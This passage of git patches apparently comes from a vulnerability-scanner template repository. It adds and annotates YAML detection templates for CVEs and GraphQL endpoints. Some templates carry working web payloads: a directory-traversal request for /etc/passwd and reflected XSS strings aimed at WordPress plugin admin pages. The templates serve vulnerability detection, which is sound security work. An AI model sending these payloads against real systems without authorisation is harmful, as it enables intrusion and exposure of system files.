cve,cve2011,lfi,chyrp requests: - method: GET diff --git a/cves/2012/CVE-2012-0981.yml b/cves/2012/CVE-2012-0981.yaml similarity index 92% rename from cves/2012/CVE-2012-0981.yml rename to cves/2012/CVE-2012-0981.yaml index 1fbd334ebd..549281d0ab 100644 --- a/cves/2012/CVE-2012-0981.yml +++ b/cves/2012/CVE-2012-0981.yaml @@ -8,7 +8,7 @@ info: reference: - https://www.exploit-db.com/exploits/18435 - https://www.cvedetails.com/cve/CVE-2012-0981 - tags: cve,cve2012,lfi + tags: cve,cve2012,lfi,phpshowtime requests: - method: GET diff --git a/cves/2012/CVE-2012-0996.yml b/cves/2012/CVE-2012-0996.yaml similarity index 95% rename from cves/2012/CVE-2012-0996.yml rename to cves/2012/CVE-2012-0996.yaml index 2b2b93c82d..b096e5a0ba 100644 --- a/cves/2012/CVE-2012-0996.yml +++ b/cves/2012/CVE-2012-0996.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in 11in1 1.2.1 stable 12-31-2011 allow remote attackers to read arbitrary files via a .. (dot dot) in the class parameter to (1) index.php or (2) admin/index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/36784 - https://www.cvedetails.com/cve/CVE-2012-0996 tags: cve,cve2012,lfi diff --git a/cves/2012/CVE-2012-1226.yml b/cves/2012/CVE-2012-1226.yaml similarity index 96% rename from cves/2012/CVE-2012-1226.yml rename to cves/2012/CVE-2012-1226.yaml index 1e6131bf81..40b0d31332 100644 --- a/cves/2012/CVE-2012-1226.yml +++ b/cves/2012/CVE-2012-1226.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. - reference: | + reference: - https://www.exploit-db.com/exploits/36873 - https://www.cvedetails.com/cve/CVE-2012-1226 tags: cve,cve2012,lfi diff --git a/cves/2014/CVE-2014-10037.yml b/cves/2014/CVE-2014-10037.yaml similarity index 95% rename from cves/2014/CVE-2014-10037.yml rename to cves/2014/CVE-2014-10037.yaml index 45138ab312..7acb0d68b5 100644 --- a/cves/2014/CVE-2014-10037.yml +++ b/cves/2014/CVE-2014-10037.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impact via a .. (dot dot) in the url parameter to photoalbum/index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/30865 - https://www.cvedetails.com/cve/CVE-2014-10037 tags: cve,cve2014,lfi diff --git a/cves/2014/CVE-2014-5111.yml b/cves/2014/CVE-2014-5111.yaml similarity index 100% rename from cves/2014/CVE-2014-5111.yml rename to cves/2014/CVE-2014-5111.yaml diff --git a/cves/2014/CVE-2014-5258.yml b/cves/2014/CVE-2014-5258.yaml similarity index 95% rename from cves/2014/CVE-2014-5258.yml rename to cves/2014/CVE-2014-5258.yaml index 3bbaec6a5e..70144e35a4 100644 --- a/cves/2014/CVE-2014-5258.yml +++ b/cves/2014/CVE-2014-5258.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in showTempFile.php in webEdition CMS before 6.3.9.0 Beta allows remote authenticated users to read arbitrary files via a .. (dot dot) in the file parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/34761 - https://www.cvedetails.com/cve/CVE-2014-5258 tags: cve,cve2014,lfi diff --git a/cves/2015/CVE-2015-1000012.yaml b/cves/2015/CVE-2015-1000012.yaml index 75c35ff769..52ad59227d 100644 --- a/cves/2015/CVE-2015-1000012.yaml +++ b/cves/2015/CVE-2015-1000012.yaml @@ -7,13 +7,13 @@ info: reference: - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 - tags: cve,cve2015,wordpress,wp-plugin,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2015-1000012 cwe-id: CWE-200 description: "Local File Inclusion Vulnerability in mypixs v0.3 wordpress plugin" + tags: cve,cve2015,wordpress,wp-plugin,lfi requests: - method: GET diff --git a/cves/2015/CVE-2015-4414.yml b/cves/2015/CVE-2015-4414.yaml similarity index 96% rename from cves/2015/CVE-2015-4414.yml rename to cves/2015/CVE-2015-4414.yaml index 765e2d69dd..ac61202462 100644 --- a/cves/2015/CVE-2015-4414.yml +++ b/cves/2015/CVE-2015-4414.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in download_audio.php in the SE HTML5 Album Audio Player (se-html5-album-audio-player) plugin 1.1.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. - reference: | + reference: - https://www.exploit-db.com/exploits/37274 - https://www.cvedetails.com/cve/CVE-2015-4414 tags: cve,cve2015,wordpress,wp-plugin,lfi diff --git a/cves/2015/CVE-2015-4632.yml b/cves/2015/CVE-2015-4632.yaml similarity index 100% rename from cves/2015/CVE-2015-4632.yml rename to cves/2015/CVE-2015-4632.yaml From 56591bf8b9dff802c7387e0e610b0fb67a567ee8 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 28 Sep 2021 16:13:38 +0530 Subject: [PATCH 2562/4083] Update CVE-2010-2857.yaml --- cves/2010/CVE-2010-2857.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2010/CVE-2010-2857.yaml b/cves/2010/CVE-2010-2857.yaml index 41f3443057..1478adabab 100644 --- a/cves/2010/CVE-2010-2857.yaml +++ b/cves/2010/CVE-2010-2857.yaml @@ -13,7 +13,7 @@ info: requests: - method: GET path: - - "{{BaseURL}}/component/music/album.html?cid=[LFI]%00" + - "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: @@ -24,4 +24,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From 61e9ced3df7d1fdc7bdb6b8bad52aa20c5517e6a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 10:45:00 +0000 Subject: [PATCH 2563/4083] Auto Generated CVE annotations [Tue Sep 28 10:45:00 UTC 2021] :robot: --- cves/2015/CVE-2015-4632.yaml | 5 +++++ cves/2021/CVE-2021-22005.yaml | 5 +++++ cves/2021/CVE-2021-33544.yaml | 7 ++++++- 3 files changed, 16 insertions(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-4632.yaml b/cves/2015/CVE-2015-4632.yaml index 9c3123e887..6e9567001c 100644 --- a/cves/2015/CVE-2015-4632.yaml +++ b/cves/2015/CVE-2015-4632.yaml @@ -9,6 +9,11 @@ info: - https://www.exploit-db.com/exploits/37388 - https://www.cvedetails.com/cve/CVE-2015-4632 tags: cve,cve2015,lfi + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2015-4632 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-22005.yaml b/cves/2021/CVE-2021-22005.yaml index 6a7b22b6f6..82caf272c4 100644 --- a/cves/2021/CVE-2021-22005.yaml +++ b/cves/2021/CVE-2021-22005.yaml @@ -10,6 +10,11 @@ info: - https://www.vmware.com/security/advisories/VMSA-2021-0020.html - https://core.vmware.com/vmsa-2021-0020-questions-answers-faq tags: cve,cve2021,vmware,vcenter + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-22005 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-33544.yaml b/cves/2021/CVE-2021-33544.yaml index 0d381d2581..6337242a45 100644 --- a/cves/2021/CVE-2021-33544.yaml +++ b/cves/2021/CVE-2021-33544.yaml @@ -4,10 +4,15 @@ info: name: Geutebruck RCE description: Multiple vulnerabilities in the web-based management interface of Geutebruck could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. author: gy741 - severity: critical + severity: high reference: - https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/ tags: cve,cve2021,geutebruck,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.20 + cve-id: CVE-2021-33544 + cwe-id: CWE-77 requests: - raw: From 7004fb9c724fdf3dd3330a421f929ca7c4527ee2 Mon Sep 17 00:00:00 2001 From: KingOfTips Date: Tue, 28 Sep 2021 10:07:36 -0300 Subject: [PATCH 2564/4083] Create graphql-tuning.yaml --- technologies/graphql-tuning.yaml | 166 +++++++++++++++++++++++++++++++ 1 file changed, 166 insertions(+) create mode 100644 technologies/graphql-tuning.yaml diff --git a/technologies/graphql-tuning.yaml b/technologies/graphql-tuning.yaml new file mode 100644 index 0000000000..9a9e189cb4 --- /dev/null +++ b/technologies/graphql-tuning.yaml @@ -0,0 +1,166 @@ +id: tuning-graphql-detect + +info: + name: Tuning GraphQL API Detection + author: '@OFJAAAH' + severity: info + tags: tech,graphql + +requests: + - method: POST + path: + - "{{BaseURL}}/___graphql" + - "{{BaseURL}}/altair" + - "{{BaseURL}}/explorer" + - "{{BaseURL}}/graphiql" + - "{{BaseURL}}/graphiql.css" + - "{{BaseURL}}/graphiql/finland" + - "{{BaseURL}}/graphiql.js" + - "{{BaseURL}}/graphiql.min.css" + - "{{BaseURL}}/graphiql.min.js" + - "{{BaseURL}}/graphiql.php" + - "{{BaseURL}}/graphql" + - "{{BaseURL}}/graphql/console" + - "{{BaseURL}}/graphql-explorer" + - "{{BaseURL}}/graphql.php" + - "{{BaseURL}}/graphql/schema.json" + - "{{BaseURL}}/graphql/schema.xml" + - "{{BaseURL}}/graphql/schema.yaml" + - "{{BaseURL}}/playground" + - "{{BaseURL}}/subscriptions" + - "{{BaseURL}}/api/graphql" + - "{{BaseURL}}/je/graphql" + - "{{BaseURL}}/graph" + - "{{BaseURL}}/v1/altair" + - "{{BaseURL}}/v1/explorer" + - "{{BaseURL}}/v1/graphiql" + - "{{BaseURL}}/v1/graphiql.css" + - "{{BaseURL}}/v1/graphiql/finland" + - "{{BaseURL}}/v1/graphiql.js" + - "{{BaseURL}}/v1/graphiql.min.css" + - "{{BaseURL}}/v1/graphiql.min.js" + - "{{BaseURL}}/v1/graphiql.php" + - "{{BaseURL}}/v1/graphql" + - "{{BaseURL}}/v1/graphql/console" + - "{{BaseURL}}/v1/graphql-explorer" + - "{{BaseURL}}/v1/graphql.php" + - "{{BaseURL}}/v1/graphql/schema.json" + - "{{BaseURL}}/v1/graphql/schema.xml" + - "{{BaseURL}}/v1/graphql/schema.yaml" + - "{{BaseURL}}/v1/playground" + - "{{BaseURL}}/v1/subscriptions" + - "{{BaseURL}}/v1/api/graphql" + - "{{BaseURL}}/v1/graph" + - "{{BaseURL}}/v2/altair" + - "{{BaseURL}}/v2/explorer" + - "{{BaseURL}}/v2/graphiql" + - "{{BaseURL}}/v2/graphiql.css" + - "{{BaseURL}}/v2/graphiql/finland" + - "{{BaseURL}}/v2/graphiql.js" + - "{{BaseURL}}/v2/graphiql.min.css" + - "{{BaseURL}}/v2/graphiql.min.js" + - "{{BaseURL}}/v2/graphiql.php" + - "{{BaseURL}}/v2/graphql" + - "{{BaseURL}}/v2/graphql/console" + - "{{BaseURL}}/v2/graphql-explorer" + - "{{BaseURL}}/v2/graphql.php" + - "{{BaseURL}}/v2/graphql/schema.json" + - "{{BaseURL}}/v2/graphql/schema.xml" + - "{{BaseURL}}/v2/playground" + - "{{BaseURL}}/v2/graphql/schema.yaml" + - "{{BaseURL}}/v2/playground" + - "{{BaseURL}}/v2/subscriptions" + - "{{BaseURL}}/v2/api/graphql" + - "{{BaseURL}}/v2/graph" + - "{{BaseURL}}/v3/altair" + - "{{BaseURL}}/v3/explorer" + - "{{BaseURL}}/v3/graphiql" + - "{{BaseURL}}/v3/graphiql.css" + - "{{BaseURL}}/v3/graphiql/finland" + - "{{BaseURL}}/v3/graphiql.js" + - "{{BaseURL}}/v3/graphiql.min.css" + - "{{BaseURL}}/v3/graphiql.min.js" + - "{{BaseURL}}/v3/graphiql.php" + - "{{BaseURL}}/v3/graphql" + - "{{BaseURL}}/v3/graphql/console" + - "{{BaseURL}}/v3/graphql-explorer" + - "{{BaseURL}}/v3/graphql.php" + - "{{BaseURL}}/v3/graphql/schema.json" + - "{{BaseURL}}/v3/graphql/schema.xml" + - "{{BaseURL}}/v3/graphql/schema.yaml" + - "{{BaseURL}}/v3/playground" + - "{{BaseURL}}/v3/subscriptions" + - "{{BaseURL}}/v3/api/graphql" + - "{{BaseURL}}/v3/graph" + - "{{BaseURL}}/v4/altair" + - "{{BaseURL}}/v4/explorer" + - "{{BaseURL}}/v4/graphiql" + - "{{BaseURL}}/v4/graphiql.css" + - "{{BaseURL}}/v4/graphiql/finland" + - "{{BaseURL}}/v4/graphiql.js" + - "{{BaseURL}}/v4/graphiql.min.css" + - "{{BaseURL}}/v4/graphiql.min.js" + - "{{BaseURL}}/v4/graphiql.php" + - "{{BaseURL}}/v4/graphql" + - "{{BaseURL}}/v4/graphql/console" + - "{{BaseURL}}/v4/graphql-explorer" + - "{{BaseURL}}/v4/graphql.php" + - "{{BaseURL}}/v4/graphql/schema.json" + - "{{BaseURL}}/v4/graphql/schema.xml" + - "{{BaseURL}}/v4/graphql/schema.yaml" + - "{{BaseURL}}/v4/playground" + - "{{BaseURL}}/v4/subscriptions" + - "{{BaseURL}}/v4/api/graphql" + - "{{BaseURL}}/v4/graph" + - "{{BaseURL}}/graphql" + - "{{BaseURL}}/v4/explorer" + - "{{BaseURL}}/graphiql" + - "{{BaseURL}}/graphql.php" + - "{{BaseURL}}/graphql/console" + - "{{BaseURL}}/v1" + - "{{BaseURL}}/v2" + - "{{BaseURL}}/v3" + - "{{BaseURL}}/graphql-console" + - "{{BaseURL}}/query-laravel" + - "{{BaseURL}}/v3/subscriptions" + - "{{BaseURL}}/v3/graphql/schema.xml" + - "{{BaseURL}}/v3/graphql/schema.yaml" + - "{{BaseURL}}/v3/playground" + - "{{BaseURL}}/v3/graphql/schema.json" + - "{{BaseURL}}/graphql/schema.yaml" + - "{{BaseURL}}/graphql/schema.xml" + - "{{BaseURL}}/graphql/schema.json" + - "{{BaseURL}}/graphiql/finland" + - "{{BaseURL}}/graphiql.css" + - "{{BaseURL}}/graphql-devtools" + - "{{BaseURL}}/graphql/v1" + - "{{BaseURL}}/v1/graphql" + - "{{BaseURL}}/api/graphql/v1" + - "{{BaseURL}}/portal-graphql" + - "{{BaseURL}}/graphql-playground" + - "{{BaseURL}}/laravel-graphql-playground" + - "{{BaseURL}}/query-explorer" + - "{{BaseURL}}/sphinx-graphiql" + - "{{BaseURL}}/express-graphql" + - "{{BaseURL}}/query" + - "{{BaseURL}}/HyperGraphQL" + - "{{BaseURL}}/graphql/graphql-playground" + + headers: + Content-Type: application/json + + body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}' + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: regex + regex: + - "__schema" + - "(Introspection|INTROSPECTION|introspection).*?" + - ".*?operation not found.*?" + condition: or From b91abeab0957297c2ea18a4869e6e6f52053eb3d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 Sep 2021 22:26:37 +0530 Subject: [PATCH 2565/4083] Create CVE-2021-24226.yaml --- cves/2021/CVE-2021-24226.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2021/CVE-2021-24226.yaml diff --git a/cves/2021/CVE-2021-24226.yaml b/cves/2021/CVE-2021-24226.yaml new file mode 100644 index 0000000000..6216504a91 --- /dev/null +++ b/cves/2021/CVE-2021-24226.yaml @@ -0,0 +1,25 @@ +id: CVE-2021-24226 + +info: + name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage + author: dhiyaneshDK + severity: low + reference: + - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16 + tags: wordpress,cves,cve2021 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - '

    Date: Tue, 28 Sep 2021 16:57:55 +0000 Subject: [PATCH 2566/4083] Auto Generated CVE annotations [Tue Sep 28 16:57:55 UTC 2021] :robot: --- cves/2021/CVE-2021-24226.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24226.yaml b/cves/2021/CVE-2021-24226.yaml index 6216504a91..fd84fbc0af 100644 --- a/cves/2021/CVE-2021-24226.yaml +++ b/cves/2021/CVE-2021-24226.yaml @@ -3,10 +3,16 @@ id: CVE-2021-24226 info: name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage author: dhiyaneshDK - severity: low + severity: high reference: - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16 tags: wordpress,cves,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-24226 + cwe-id: CWE-200 + description: "In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required." requests: - method: GET From ed8bc69c87314822c661327aa05043ed30f27453 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 Sep 2021 22:33:24 +0530 Subject: [PATCH 2567/4083] Create CVE-2021-24275.yaml --- cves/2021/CVE-2021-24275.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-24275.yaml diff --git a/cves/2021/CVE-2021-24275.yaml b/cves/2021/CVE-2021-24275.yaml new file mode 100644 index 0000000000..f9769d9d9b --- /dev/null +++ b/cves/2021/CVE-2021-24275.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-24275 + +info: + name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS) + author: dhiyaneshDK + severity: low + reference: + - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f + tags: wordpress,cves,cve2021 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="onmouseover=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + + matchers-condition: and + matchers: + - type: word + words: + - 'alert(/XSS/)/' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header From f122f2c7b387bfd287aa0d106ee93c9c8be92fb7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 17:04:46 +0000 Subject: [PATCH 2568/4083] Auto Generated CVE annotations [Tue Sep 28 17:04:46 UTC 2021] :robot: --- cves/2021/CVE-2021-24275.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24275.yaml b/cves/2021/CVE-2021-24275.yaml index f9769d9d9b..5590f033eb 100644 --- a/cves/2021/CVE-2021-24275.yaml +++ b/cves/2021/CVE-2021-24275.yaml @@ -3,10 +3,16 @@ id: CVE-2021-24275 info: name: Popup by Supsystic < 1.10.5 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK - severity: low + severity: medium reference: - https://wpscan.com/vulnerability/efdc76e0-c14a-4baf-af70-9d381107308f tags: wordpress,cves,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24275 + cwe-id: CWE-79 + description: "The Popup by Supsystic WordPress plugin before 1.10.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" requests: - method: GET From a484d974a19d0500d400d0a5d745379be135382a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 Sep 2021 22:37:40 +0530 Subject: [PATCH 2569/4083] Create CVE-2021-24276.yaml --- cves/2021/CVE-2021-24276.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-24276.yaml diff --git a/cves/2021/CVE-2021-24276.yaml b/cves/2021/CVE-2021-24276.yaml new file mode 100644 index 0000000000..28ecf01802 --- /dev/null +++ b/cves/2021/CVE-2021-24276.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-24276 + +info: + name: Contact Form by Supsystic < 1.7.15 - Reflected Cross-Site scripting (XSS) + author: dhiyaneshDK + severity: low + reference: + - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c + tags: wordpress,cves,cve2021 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab="onmouseover=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + + matchers-condition: and + matchers: + - type: word + words: + - 'alert(/XSS/)/' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header From 0b79b925c9cbaeaba3e69018d4758ff8abf9d3bb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 17:08:48 +0000 Subject: [PATCH 2570/4083] Auto Generated CVE annotations [Tue Sep 28 17:08:48 UTC 2021] :robot: --- cves/2021/CVE-2021-24276.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24276.yaml b/cves/2021/CVE-2021-24276.yaml index 28ecf01802..3122936119 100644 --- a/cves/2021/CVE-2021-24276.yaml +++ b/cves/2021/CVE-2021-24276.yaml @@ -3,10 +3,16 @@ id: CVE-2021-24276 info: name: Contact Form by Supsystic < 1.7.15 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK - severity: low + severity: medium reference: - https://wpscan.com/vulnerability/1301123c-5e63-432a-ab90-3221ca532d9c tags: wordpress,cves,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24276 + cwe-id: CWE-79 + description: "The Contact Form by Supsystic WordPress plugin before 1.7.15 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" requests: - method: GET From 48f33d66f49af211560d93fc3d475926a34b30b4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 Sep 2021 22:41:24 +0530 Subject: [PATCH 2571/4083] Update CVE-2021-24276.yaml --- cves/2021/CVE-2021-24276.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24276.yaml b/cves/2021/CVE-2021-24276.yaml index 3122936119..c79a5f9b01 100644 --- a/cves/2021/CVE-2021-24276.yaml +++ b/cves/2021/CVE-2021-24276.yaml @@ -18,7 +18,7 @@ requests: - method: GET path: - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab="onmouseover=alert(/XSS/)//' - - '{{BaseURL}}/wp-admin/admin.php?page=popup-wp-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' matchers-condition: and matchers: From b4ea85bcb7a95cd74ec07297d9a2bfa870710622 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 28 Sep 2021 22:41:56 +0530 Subject: [PATCH 2572/4083] Create CVE-2021-24274.yaml --- cves/2021/CVE-2021-24274.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-24274.yaml diff --git a/cves/2021/CVE-2021-24274.yaml b/cves/2021/CVE-2021-24274.yaml new file mode 100644 index 0000000000..4e6912b22c --- /dev/null +++ b/cves/2021/CVE-2021-24274.yaml @@ -0,0 +1,31 @@ +id: CVE-2021-24274 + +info: + name: Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS) + author: dhiyaneshDK + severity: low + reference: + - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d + tags: wordpress,cves,cve2021 + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="onmouseover=alert(/XSS/)//' + - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//' + + matchers-condition: and + matchers: + - type: word + words: + - 'alert(/XSS/)/' + condition: and + + - type: status + status: + - 200 + + - type: word + words: + - "text/html" + part: header From 53651864fc8d1a6967f30d05493d98c3d307a0fa Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 28 Sep 2021 17:13:05 +0000 Subject: [PATCH 2573/4083] Auto Generated CVE annotations [Tue Sep 28 17:13:05 UTC 2021] :robot: --- cves/2021/CVE-2021-24274.yaml | 8 +++++++- 1 file changed, 7 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-24274.yaml b/cves/2021/CVE-2021-24274.yaml index 4e6912b22c..713ecbfab5 100644 --- a/cves/2021/CVE-2021-24274.yaml +++ b/cves/2021/CVE-2021-24274.yaml @@ -3,10 +3,16 @@ id: CVE-2021-24274 info: name: Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK - severity: low + severity: medium reference: - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d tags: wordpress,cves,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-24274 + cwe-id: CWE-79 + description: "The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" requests: - method: GET From 23d3993c460a6118cde203df4ad5855be60360e5 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 29 Sep 2021 00:18:37 +0530 Subject: [PATCH 2574/4083] Update CVE-2021-24226.yaml --- cves/2021/CVE-2021-24226.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-24226.yaml b/cves/2021/CVE-2021-24226.yaml index fd84fbc0af..071b117a42 100644 --- a/cves/2021/CVE-2021-24226.yaml +++ b/cves/2021/CVE-2021-24226.yaml @@ -4,15 +4,16 @@ info: name: AccessAlly < 3.5.7 - $_SERVER Superglobal Leakage author: dhiyaneshDK severity: high + description: In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required. reference: - https://wpscan.com/vulnerability/8e3e89fd-e380-4108-be23-00e87fbaad16 - tags: wordpress,cves,cve2021 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24226 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.50 cve-id: CVE-2021-24226 cwe-id: CWE-200 - description: "In the AccessAlly WordPress plugin before 3.5.7, the file \"resource/frontend/product/product-shortcode.php\" responsible for the [accessally_order_form] shortcode is dumping serialize($_SERVER), which contains all environment variables. The leakage occurs on all public facing pages containing the [accessally_order_form] shortcode, no login or administrator role is required." + tags: wordpress,cves,cve2021,wp-plugin requests: - method: GET @@ -25,6 +26,7 @@ requests: words: - '
    Date: Wed, 29 Sep 2021 00:20:48 +0530 Subject: [PATCH 2575/4083] Update CVE-2021-24274.yaml --- cves/2021/CVE-2021-24274.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cves/2021/CVE-2021-24274.yaml b/cves/2021/CVE-2021-24274.yaml index 713ecbfab5..ecb34605e2 100644 --- a/cves/2021/CVE-2021-24274.yaml +++ b/cves/2021/CVE-2021-24274.yaml @@ -4,27 +4,27 @@ info: name: Ultimate Maps by Supsystic < 1.2.5 - Reflected Cross-Site scripting (XSS) author: dhiyaneshDK severity: medium + description: The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue reference: - https://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d - tags: wordpress,cves,cve2021 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24274 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.10 cve-id: CVE-2021-24274 cwe-id: CWE-79 - description: "The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue" + tags: wordpress,cve,cve2021,wp-plugin requests: - method: GET path: - - '{{BaseURL}}/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="onmouseover=alert(/XSS/)//' - - 